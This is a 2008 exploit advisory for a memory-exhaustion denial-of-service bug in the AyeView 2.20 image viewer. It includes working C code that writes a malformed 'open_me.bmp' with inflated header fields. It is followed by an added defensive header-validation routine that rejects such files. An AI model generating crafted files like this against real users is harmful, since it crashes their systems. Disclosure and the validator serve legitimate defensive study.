AyeView 2.20 (invalid bitmap header parsing) DoS Exploit
Source: DaRk-CodeRs Group  Author: suN8Hclf  Published: 2008-10-06
Name      : AyeView v2.20 (invalid bitmap header parsing) DoS Exploit
Credit    : suN8Hclf (DaRk-CodeRs Group), crimson.loyd@gmail.com
Download  : http://www.ayeview.com/downloads.htm
Greetz    : Luigi Auriemma, 0in, cOndemned, e.wiZz!, Gynvael Coldwind,
            Katharsis, str0ke, all from #dark-coders and others;]

Short Desc:
AyeView v2.20 does not properly parse the values in the BMP file header.
In fact it parses them correctly, but it does not check whether these values
are "reasonable". Therefore we can create a special bitmap that will slow down
or even suspend the entire system. I have written a PoC that forces AyeView
to allocate large amounts of memory. Short history:

First run of the exploit    ->  the system really slowed down
Second run (other values)   ->  I got a message that "the amount of virtual memory
                                is too low", explorer.exe crashed
Third run (other values)    ->  AyeView crashed

PoC:
------------------------------exploit---------------------------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* memset */

struct bmpfile_header{
    short bfType;
    int bfSize;
    int Res;
    int bfOffBits;
    int biSize;
    int biWidth;
    int biHeight;
    short biPlanes;
    short biBitCount;
    int biCompression;
    int biSizeImage;
    int biXPelsPerMeter;
    int biYPelsPerMeter;
    int biClrUsed;
    char biClrImportant;
    char biClrRotation;
    short biReserved;
}__attribute__((packed)); //shift to 54 bytes


#define WIDTH 3000       //play around with these values...
#define HEIGHT 60000
#define Y 44432
#define X 54444

int main(int argc, char *argv[])
{
    struct bmpfile_header *bmpheader;
    char *memory;
    FILE *f;

    /* 54-byte header plus 6 bytes of pixel data, all zeroed */
    memory=(char *)malloc(60);
    if(memory==NULL){
        perror("malloc");
        return -1;
    }
    memset(memory, 0, 60);
    bmpheader=(struct bmpfile_header *)memory;
    printf("[+]Building bitmap... :)\n");
    bmpheader->bfType=*(short *)"BM";
    bmpheader->bfSize=(int)60;
    bmpheader->Res=0;
    bmpheader->bfOffBits=54;
    bmpheader->biSize=40;
    /* declared dimensions are far larger than the 60-byte file can hold */
    bmpheader->biHeight=(int)HEIGHT;
    bmpheader->biWidth=(int)WIDTH;
    bmpheader->biPlanes=1;
    bmpheader->biBitCount=24;
    bmpheader->biCompression=0;
    bmpheader->biSizeImage=6;
    bmpheader->biXPelsPerMeter=(int)X;
    bmpheader->biYPelsPerMeter=(int)Y;
    bmpheader->biClrUsed=255*255*255;
    bmpheader->biClrImportant=0;
    bmpheader->biClrRotation=0;

    f=fopen("open_me.bmp", "wb");
    if(!f){
        perror("fopen");
        free(memory);
        exit(-1);
    }
    fwrite(memory, 1, 60, f);
    fclose(f);
    printf("[+]open_me.bmp bitmap created :)\n");
    free(memory);
    return 0;
}
------------------------------exploit---------------------------

Stay secure...
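
The "reasonableness" check that the description says is missing, written as a header validator a viewer could run before allocating anything. This is an added example, not code from the advisory or from AyeView; the names bmp_check and bmp_sample and the limits MAX_DIM and MAX_PIX are assumptions, and only uncompressed bitmaps with a 40-byte info header are accepted.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MAX_DIM 65535u          /* assumed policy cap per side */
#define MAX_PIX (256ull << 20)  /* assumed cap on decoded pixel bytes */

static uint32_t le32(const uint8_t *p) {
    return p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}
static void put32(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

/* 0 = header is consistent with a file of file_len bytes; <0 = reject code. */
int bmp_check(const uint8_t *b, uint64_t file_len) {
    if (file_len < 54 || b[0] != 'B' || b[1] != 'M') return -1;
    uint32_t off = le32(b + 10), bpp = b[28] | b[29] << 8, used = le32(b + 46);
    int64_t w = (int32_t)le32(b + 18), h = (int32_t)le32(b + 22);
    if (le32(b + 14) != 40 || le32(b + 30) != 0) return -2;  /* BI_RGB only */
    if (bpp != 1 && bpp != 4 && bpp != 8 && bpp != 24 && bpp != 32) return -2;
    if (h < 0) h = -h;                        /* negative height = top-down */
    if (w <= 0 || h == 0 || w > MAX_DIM || h > MAX_DIM) return -3;
    uint64_t need = ((uint64_t)w * bpp + 31) / 32 * 4 * (uint64_t)h; /* padded rows */
    if (need > MAX_PIX) return -4;
    if (bpp <= 8 && used > (1u << bpp)) return -5;
    if (off < 54 || off > file_len || (uint64_t)used * 4 > off - 54) return -5;
    if (need > file_len - off) return -6;     /* pixels must exist in the file */
    return 0;
}

/* Constructed sample input: a 54-byte BI_RGB header with the given fields. */
void bmp_sample(uint8_t b[54], int32_t w, int32_t h, uint32_t bpp, uint32_t used) {
    memset(b, 0, 54);
    b[0] = 'B'; b[1] = 'M';
    put32(b + 10, 54); put32(b + 14, 40);
    put32(b + 18, (uint32_t)w); put32(b + 22, (uint32_t)h);
    b[26] = 1; b[28] = (uint8_t)bpp; put32(b + 46, used);
}

int main(void) {
    uint8_t b[54];
    bmp_sample(b, 3000, 60000, 24, 255 * 255 * 255);  /* values from the PoC */
    printf("PoC-style header, 60-byte file: %d\n", bmp_check(b, 60));
    bmp_sample(b, 2, 2, 24, 0);                       /* 2x2, 8-byte rows */
    printf("2x2 image, 70-byte file: %d\n", bmp_check(b, 70));
    return 0;
}
```

The -6 check does not depend on the chosen caps: a header whose declared pixel data is larger than what follows bfOffBits in the file is rejected whatever the limits are.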

 